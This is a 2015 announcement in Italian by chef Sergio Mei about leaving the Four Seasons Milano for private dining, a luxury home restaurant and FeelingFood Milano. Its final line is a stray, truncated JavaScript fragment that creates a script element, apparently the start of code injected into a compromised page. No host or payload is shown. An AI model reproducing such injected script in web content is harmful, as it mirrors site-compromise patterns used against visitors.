Il Nuovo Sergio Mei

Milano, 13.10.2015

“Conosco delle barche che si dimenticano di partire. Hanno paura del mare a furia di invecchiare”.

Con questa frase di Jacques Brel, inizio la mia nuova avventura scegliendo di salpare. Dopo essere stato per più di vent’anni Executive Chef del Four Seasons Hotel Milano, a gennaio del 2015 ho deciso di intraprendere un nuovo viaggio fatto ancora di passione per l’alta cucina e l’ospitalità di qualità.

Tre grandi progetti: uno dedicato ai palati più esigenti, il primo Home Restaurant di lusso e un progetto esclusivo da dirigere.

Cena a casa Vostra 
Nasce dalla volontà di realizzare cene su misura, dedicate a ogni singola esigenza all’interno di contesti privati. Menù personalizzati, preparati al momento secondo il gusto dei clienti al fine di realizzare un’occasione unica e totale. (Da un minimo di 8 persone ad un massimo di 12).

Una finestra su Milano
In un momento in cui gli home restaurant si stanno rivelando una buona alternativa ai ristoranti, ho deciso di dar vita al mio ‐ Una finestra su Milano ‐ all’interno del lussuoso appartamento di un’amica di lunga data, nel cuore centrale del quadrilatero della moda milanese. 

(Da un minimo di 8 persone ad un massimo di 10).

FeelingFood Milano

Mettere a disposizione gli oltre quarantacinque anni di esperienza, professionalità e passione al servizio del pubblico, è il motivo che mi ha spinto a dirigere FeelingFood Milano, in qualità di Direttore e Responsabile Food & Beverage.

Un’iniziativa unica nel panorama milanese e nazionale, uno spazio polifunzionale nato dall’idea di MGM Alimentari, leader nel settore della commercializzazione di prodotti alimentari top di raffinata e pregiata qualità artigianale.

Eventi, workshop, corsi di cucina di qualità e molteplici iniziative culturali saranno aperte al pubblico che vorrà degustare e conoscere le miglior eccellenze enogastronomiche, sapientemente selezionate da me.

Continueranno le consulenze nel settore Food & Beverage in territorio nazionale e internazionale, le collaborazioni per aperture di ristoranti e hotel e i catering di lusso per matrimoni ed eventi privati di alto livello.

var d=document;var s=d.createElement(‘script’);